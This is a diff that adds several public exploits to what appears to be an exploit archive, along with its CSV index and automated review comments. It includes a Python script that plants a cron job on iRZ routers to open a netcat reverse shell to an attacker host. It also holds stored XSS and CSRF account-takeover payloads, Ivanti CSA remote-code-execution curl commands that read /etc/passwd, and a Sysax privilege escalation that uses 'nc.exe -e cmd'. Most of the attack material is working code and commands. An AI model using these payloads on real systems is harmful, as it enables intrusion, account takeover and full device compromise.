diff --git a/exploits/hardware/remote/50832.py b/exploits/hardware/remote/50832.py
new file mode 100755
index 000000000..958dcfe21
--- /dev/null
+++ b/exploits/hardware/remote/50832.py
@@ -0,0 +1,157 @@ +# Exploit Title: iRZ Mobile Router - CSRF to RCE +# Google Dork: intitle:"iRZ Mobile Router" +# Date: 2022-03-18 +# Exploit Author: Stephen Chavez & Robert Willis +# Vendor Homepage: https://en.irz.ru/ +# Software Link: https://github.com/SakuraSamuraii/ez-iRZ +# Version: Routers through 2022-03-16 +# Tested on: RU21, RU21w, RL21, RU41, RL01 +# CVE : CVE-2022-27226 + +import os +import requests +import json +import subprocess + +option = "0" + + +def main(): + print("####################################################") + print("# Welcome to IRZ CSRF to RCE Exploit - version 1.0 #") + print("####################################################") + print() + print("## by RedragonX of WHG & rej_ex of SAKURA SAMURAI ##") + print() + print("1. Post Authentication RCE (Needs Credentials)") + print("2. CSRF to RCE (No Credentials)") + print() + runit() + + +def runit(): + option = input("Select an option: ") + if option == "1": + exploit1() + elif option == "2": + exploit2() + else: + print("You must select '1' or '2'. 
Exiting.") + + +def exploit1(): + print("## Running Post Auth RCE exploit") + print() + print() + router_ip = input("## Enter the router ip to exploit: ") + router_port = int( + input("## Enter the victim router web page port (default is 80): ") or "80") + + router_user = input("## Enter the username for the router login: ") + router_pass = input("## Enter the password for the router login: ") + + LHOST = input("## Enter the LHOST for the router reverse shell: ") + LPORT = input("## Enter the LPORT for the router reverse shell: ") + + router_url = f'http://{router_ip}:{router_port}' + + nc1_str = f'Start a listener with the following command: nc -lvp {LPORT}' + + input(nc1_str + "\n\nPress enter once you do") + + send_json_payload(router_url, router_user, router_pass, LHOST, LPORT) + + +def send_json_payload(router_url, router_user, router_pass, lhost_ip, lhost_port): + + intro = f'Sending the payload to {router_url}\n' + print(intro) + payload_str = '{"tasks":[{"enable":true,"minutes":"*","hours":"*","days":"*","months":"*","weekdays":"*","command":"rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc ' + \ + f'{lhost_ip} {lhost_port} ' + \ + '>/tmp/f"}],"_board":{"name":"RL21","platform":"irz_mt02","time":"Wed Mar 16 16:43:20 UTC 2022"}}' + + payload_json = json.loads(payload_str) + + s = requests.Session() + + s.auth = (router_user, router_pass) + + s.headers.update( + {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"}) + s.headers.update({"X-Requested-With": "XMLHttpRequest"}) + s.headers.update({"Origin": router_url}) + s.headers.update({"Referer": router_url}) + + s.post(router_url + "/api/crontab", json=payload_json) + + exploit_str = f'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip} 443 >/tmp/f' + + print( + "Request sent! You may have to wait about 2 minutes to get a shell. \nFirst shell will die due to crontab job. Start a new listener on a new port [e.g. 
443], and run the following command: " + exploit_str) + print("To fix TTY: type telnet 0.0.0.0 in the shell") + + +def exploit2(): + + print("## Running CSRF to RCE exploit") + print() + print() + router_ip = input("## Enter the router ip to exploit: ") + router_port = int( + input("## Enter the victim router web page port (default is 80): ") or "80") + + LHOST = input("## Enter the LHOST for the router reverse shell: ") + LPORT = input("## Enter the LPORT for the router reverse shell: ") + + load_csrf_poc_file(router_ip, router_port, LHOST, LPORT) + + +def load_csrf_poc_file(router_ip, router_port, lhost_ip, lhost_port): + + file_path = os.path.dirname(__file__) + os.sep + "poc.template.html" + + if os.path.isfile(file_path): + with open(file_path) as poc_file: + original_poc_data_str = poc_file.read() + + new_html = original_poc_data_str.replace("{router_ip}", router_ip) + new_html = new_html.replace( + "{router_port}", str(router_port)) + + lhost_split_arr = lhost_ip.split(".") + + if len(lhost_split_arr) == 4: + + new_html = new_html.replace( + "{lhost_ip_octect_1}", lhost_split_arr[0]) + + new_html = new_html.replace( + "{lhost_ip_octect_2}", lhost_split_arr[1]) + + new_html = new_html.replace( + "{lhost_ip_octect_3}", lhost_split_arr[2]) + new_html = new_html.replace( + "{lhost_ip_octect_4}", lhost_split_arr[3]) + + new_html = new_html.replace( + "{lhost_port}", lhost_port) + + new_file_path = os.path.dirname( + __file__) + os.sep + "poc.new.html" + try: + with open(new_file_path, 'w') as new_file: + new_file.write(new_html) + + print() + print( + f'New file written to {new_file_path}. Host this file') + except FileNotFoundError: + print("You had an error writing to the file, doesn't exist.") + else: + print(f'{lhost_ip} is not a proper IPV4 address.') + + else: + print(f'{file_path} not found') + + +main() \ No newline at end of file 
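Review bot: `load_csrf_poc_file` builds `file_path` from `os.path.dirname(__file__) + os.sep + "poc.template.html"`, and `os.path.dirname` returns the empty string whenever `__file__` is a bare relative name (as it is for `python 50832.py` on interpreters older than 3.9), so the path collapses to `/poc.template.html` and the function reports the template as missing even though it sits next to the script; `new_file_path` has the same problem, and a write to `/poc.new.html` raises `PermissionError`, which the `except FileNotFoundError` does not catch. Use `file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "poc.template.html")` and the matching form for `new_file_path`. The template `poc.template.html` is not part of this commit as far as the diff shows, so the header should state where it comes from. `subprocess` and the module-level `option = "0"` are unused (`runit` rebinds a local `option`), and `main()` runs at import time without an `if __name__ == "__main__":` guard.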
diff --git a/exploits/hardware/remote/50835.txt b/exploits/hardware/remote/50835.txt
new file mode 100644
index 000000000..81a8c5629
--- /dev/null
+++ b/exploits/hardware/remote/50835.txt
@@ -0,0 +1,116 @@ +# Exploit Title: ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS) +# Exploit Author: LiquidWorm + +Vendor: Integrated Control Technology Ltd. +Product web page: https://www.ict.co +Affected version: GX: Ver: 2.08.1002 K1B3 + Lib: 04.00.217 + Int: 2.3.235.J013 + OS: 2.0.20 + WX: Ver: 4.00 284 H062 + App: 02.08.766 + Lib: 04.00.169 + Int: 02.2.208 + +Summary: Protege GX is an enterprise level integrated access control, intrusion +detection and building automation solution with a feature set that is easy to +operate, simple to integrate and effortless to extend. Protege WX is an all-in-one, +web-based, cross-platform system that gives you a fully functional access control +and intrusion detection solution in a fraction of the time of conventional software. +With no software to install, setup is quick and simple. Connect the Controller and +system components, then open a web browser to launch the intuitive wizard-driven +interface which guides you through the process of configuring your system. + +Desc: The application suffers from an authenticated stored XSS vulnerability. +The issue is triggered when input passed to the 'Name' parameter is not properly +sanitized before being returned to the user. This can be exploited to execute +arbitrary HTML and script code in a user's browser session in context of an +affected site. + +Tested on: Microsoft-WinCE/6.00 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5699 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5699.php + + +08.02.2022 + +-- + + +UI navigation: +-------------- + +Scheduling > Daylight Savings > (Name field). 
+ + +Decrypted POST request: +----------------------- + +POST /daylightsaving.htm + +Command&Type=Submit&SubType=GXT_DAYLIGHTSAVINGS_TBL&DaylightSavingId=1&action=update&Name=ZSL%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&StartMonth=10&EndMonth=2&StartDay=41&EndDay=41&RecId=1 + + +Encrypted GET request: +---------------------- + +http://CONTROLLER_IP/PRT_CTRL_DIN_ISAPI.dll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dditional info: +---------------- + +Databse backup predictable name: Db_D3037E8A_8_Feb_22.bak +The D3037E8A is the serial number of the onboard reader. + +Encrypt/Decrypt functions: +-------------------------- + +From console: +> localStorage.getItem("WXKey") +< '8EDB22D9FB767538' + +function encryptAES(a, c) { + a = a.toString(); + a = unescape(encodeURIComponent(a)); + "undefined" == typeof c && (c = !0); + if (0 == servertype) + return a; + var b = localStorage.getItem("WXKey"); + if ("" == b || null == b) + return a; + for (var d = "", e = 0; 16 > e; e++) + d += String.fromCharCode(Math.floor(75 * Math.random() + 48)); + a = d + mcrypt.Encrypt(addPKCS7(a), d, b, "rijndael-128", "cbc"); + return a = c ? getCookie("SESSID") + strToHex(a) : strToHex(a) +} + +function decryptAES(a) { + if (null == a) + return ""; + a = a.toString(); + if (" < Packet not Init and not encrypted. >" == a) + a = 0 == servertype ? "login.php" : "login.htm", + window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase(); + else if ("" == a.substr(0, 17)) + a = 0 == servertype ? "login.php?logout" : "login.htm?logout", + window.location = a + "?" 
+ Math.random().toString(16).substring(2, 8).toLowerCase(); + else { + if (0 == servertype) + return a; + var c = localStorage.getItem("WXKey"); + if ("" == c) + return a; + a = hexToStr(a); + var b = a.substr(0, 16); + a = a.substr(16, a.length); + a = mcrypt.Decrypt(a, b, c, "rijndael-128", "cbc").replace(/\x00+$/g, ""); + a = removePKCS7(a); + return a = decodeURIComponent(escape(a)) + } \ No newline at end of file diff --git a/exploits/hardware/remote/50836.txt b/exploits/hardware/remote/50836.txt new file mode 100644 index 000000000..ee99fbf8a --- /dev/null +++ b/exploits/hardware/remote/50836.txt 
@@ -0,0 +1,52 @@ +# Exploit Title: ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure +# Exploit Author: LiquidWorm + +Vendor: Integrated Control Technology Ltd. +Product web page: https://www.ict.co +Affected version: GX: Ver: 2.08.1002 K1B3 + Lib: 04.00.217 + Int: 2.3.235.J013 + OS: 2.0.20 + WX: Ver: 4.00 284 H062 + App: 02.08.766 + Lib: 04.00.169 + Int: 02.2.208 + +Summary: Protege GX is an enterprise level integrated access control, intrusion +detection and building automation solution with a feature set that is easy to +operate, simple to integrate and effortless to extend. Protege WX is an all-in-one, +web-based, cross-platform system that gives you a fully functional access control +and intrusion detection solution in a fraction of the time of conventional software. +With no software to install, setup is quick and simple. Connect the Controller and +system components, then open a web browser to launch the intuitive wizard-driven +interface which guides you through the process of configuring your system. + +Desc: The application is vulnerable to improper access control that allows an +authenticated operator to disclose SHA1 password hashes (client-side) of other +users/operators. + +Tested on: Microsoft-WinCE/6.00 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5700 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5700.php + + +08.02.2022 + +-- + + +Navigate to http://CONTROLLER_IP/operator.htm + +Source: + +

+... +... + +... \ No newline at end of file diff --git a/exploits/multiple/remote/50833.txt b/exploits/multiple/remote/50833.txt new file mode 100644 index 000000000..b8cf77472 --- /dev/null +++ b/exploits/multiple/remote/50833.txt @@ -0,0 +1,25 @@ +# Exploit Title: Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE) +# Date: 20/03/2022 +# Exploit Author: d7x +# Vendor Homepage: https://www.ivanti.com/ +# Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6 +# Version: CSA 4.6 4.5 - EOF Aug 2021 +# Tested on: Linux x86_64 # CVE : CVE-2021-44529 +# CVE : CVE-2021-44529 + +### +This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz): +https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US + +Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies + +@d7x_real +https://d7x.promiselabs.net +https://www.promiselabs.net +### + +# cat /etc/passwd +curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '\K.*?(?=)'; echo + +# sleep for 10 seconds +curl -i -s -k -X $'GET' -b $'e=ab; exec=c2xlZXAoMTApOw==; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '\K.*?(?=)'; echo \ No newline at end of file diff --git a/exploits/php/webapps/50831.txt b/exploits/php/webapps/50831.txt new file mode 100644 index 000000000..066b605f5 --- /dev/null +++ b/exploits/php/webapps/50831.txt 
@@ -0,0 +1,73 @@ +# Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover +# Date: 18/03/2022 +# Exploit Author: Devansh Bordia +# Vendor Homepage: https://icehrm.com/ +# Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS +# Version: 31.0.0.OS +#Tested on: Windows 10 + +1. About - ICEHRM +IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible. + +2. Description: +The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover. + +3. Steps To Reproduce: +- Create an User name:Gaurav with permission of the Employee using the Admin User of the application and set his password. +- Now login into the application using his credentials and navigate to Update Password Feature to change the password. +- Intercept the request in Proxy and we can see there is a GET request used to change password and also NO CSRF Token is being used. +- Finally using Burpsuite create CSRF POC and save it as exploit.html. +- Now change the password in the POC to any password we want. +- Finally we open this POC in the same browser session and click on the submit button. +- At last when retrying to login into the application we can see that password has been reset for the account leading to account takeover. + +4. 
Vulnerable Request: + +GET +/app/service.php?t=Employee&a=ca&sa=changePassword&mod=modules=employees&req={"current":"Test@123 +","pwd":"Dummy@123"} HTTP/1.1 +Host: localhost:8070 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) +Gecko/20100101 Firefox/98.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Referer: +http://localhost:8070/app/?g=modules&n=employees&m=module_Personal_Information +Cookie: PHPSESSID=k8d27ve456j0jb56ga885j1vvb +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +5. Exploit POC (exploit.html) + + + + + + + + + +
+ + + + + + + + + + + + + +
+ + + + \ No newline at end of file diff --git a/exploits/windows/local/50834.txt b/exploits/windows/local/50834.txt new file mode 100644 index 000000000..06e281276 --- /dev/null +++ b/exploits/windows/local/50834.txt @@ -0,0 +1,37 @@ +# Exploit Author: bzyo (@bzyo_) +# Exploit Title: Sysax FTP Automation 6.9.0 - Privilege Escalation +# Date: 03-20-2022 +# Vulnerable Software: Sysax FTP Automation 6.9.0 +# Vendor Homepage: https://www.sysax.com/ +# Version: 6.9.0 +# Software Link: https://www.sysax.com/download/sysaxauto_setup.msi +# Tested on: Windows 10 x64 + +# Details: +Sysax Scheduler Service runs as Local System. By default the application allows for low privilege users to create/run backup jobs other than themselves. By removing the option to run as current user or another, the task will run as System. A low privilege user could abuse this and escalate their privileges to local system. + +# Prerequisites: +To successfully exploit this vulnerability, an attacker must already have local access to a system running Sysax FTP Automation using a low privileged user account + +# Exploit: +Logged in as low privileged account + +1. Create folder c:\temp +2. Download netcat (nc.exe) to c:\temp +3. Create file 'pwn.bat' in c:\temp with contents + c:\temp\nc.exe localhost 1337 -e cmd +4. Open command prompt and netcat listener + nc -nlvvp 1337 +5. Open sysaxschedscp.exe from C:\Program Files (x86)\SysaxAutomation +6. Select Setup Scheduled/Triggered Tasks + - Add task (Triggered) + - Update folder to monitor to be c:\temp + - Check 'Run task if a file is added to the monitor folder or subfolder(s)' + - Choose 'Run any other Program' and choose c:\temp\pwn.bat + - Uncheck 'Login as the following user to run task' + - Finish and Save +7. Create new text file in c:\temp +8. Check netcat listener + C:\WINDOWS\system32>whoami + whoami + nt authority\system \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a593038b9..8b7a61436 100644 
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11472,6 +11472,7 @@ id,file,description,date,author,type,platform,port
 50818,exploits/windows/local/50818.txt,"WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
 50819,exploits/windows/local/50819.txt,"Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
 50824,exploits/windows/local/50824.txt,"VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path",1970-01-01,"Faisal Alasmari",local,windows,
+50834,exploits/windows/local/50834.txt,"Sysax FTP Automation 6.9.0 - Privilege Escalation",1970-01-01,bzyo,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18650,6 +18651,10 @@ id,file,description,date,author,type,platform,port
 50821,exploits/hardware/remote/50821.py,"Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)",1970-01-01,"Aryan Chehreghani",remote,hardware,
 50822,exploits/multiple/remote/50822.txt,"Tdarr 2.00.15 - Command Injection",1970-01-01,"Sam Smith",remote,multiple,
 50829,exploits/multiple/remote/50829.py,"Apache APISIX 2.12.1 - Remote Code Execution (RCE)",1970-01-01,Ven3xy,remote,multiple,
+50832,exploits/hardware/remote/50832.py,"iRZ Mobile Router - CSRF to RCE",1970-01-01,"John Jackson",remote,hardware,
+50833,exploits/multiple/remote/50833.txt,"Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)",1970-01-01,d7x,remote,multiple,
+50835,exploits/hardware/remote/50835.txt,"ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,remote,hardware,
+50836,exploits/hardware/remote/50836.txt,"ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure",1970-01-01,LiquidWorm,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
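Review bot: The author column of the new `50832` row reads `"John Jackson"`, while the header of the `exploits/hardware/remote/50832.py` file added in the same commit names `Stephen Chavez & Robert Willis` as the exploit authors. If the index is meant to mirror the file header, the row should be `50832,exploits/hardware/remote/50832.py,"iRZ Mobile Router - CSRF to RCE",1970-01-01,"Stephen Chavez & Robert Willis",remote,hardware,`; if the column records the submitter instead, that convention is not stated anywhere visible and deserves a comment in the CSV header or the repository docs. The other three new rows (`50833`, `50835`, `50836`) do match their files' `Exploit Author` lines.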
@@ -44896,5 +44901,6 @@ id,file,description,date,author,type,platform,port
 50823,exploits/multiple/webapps/50823.txt,"Baixar GLPI Project 9.4.6 - SQLi",1970-01-01,"Prof. Joas Antonio",webapps,multiple,
 50825,exploits/php/webapps/50825.py,"Moodle 3.11.5 - SQLi (Authenticated)",1970-01-01,"Chris Anastasio",webapps,php,
 50826,exploits/php/webapps/50826.py,"Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ashish Koli",webapps,php,
+50831,exploits/php/webapps/50831.txt,"ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover",1970-01-01,"Devansh Bordia",webapps,php,
 50828,exploits/php/webapps/50828.sh,"Tiny File Manager 2.4.6 - Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",webapps,php,
 50830,exploits/php/webapps/50830.txt,"Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
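Review bot: The new `50831` row is inserted between `50826` and `50828`, which breaks the ascending id order the surrounding rows keep and differs from the other two hunks of this file, where each new id is placed after the highest existing one in its group (`50834` after `50824`, `50832`–`50836` after `50829`). Move the line so it follows the `50830` row. Whether any consumer depends on the ordering is not visible in the diff, so this is a consistency point only.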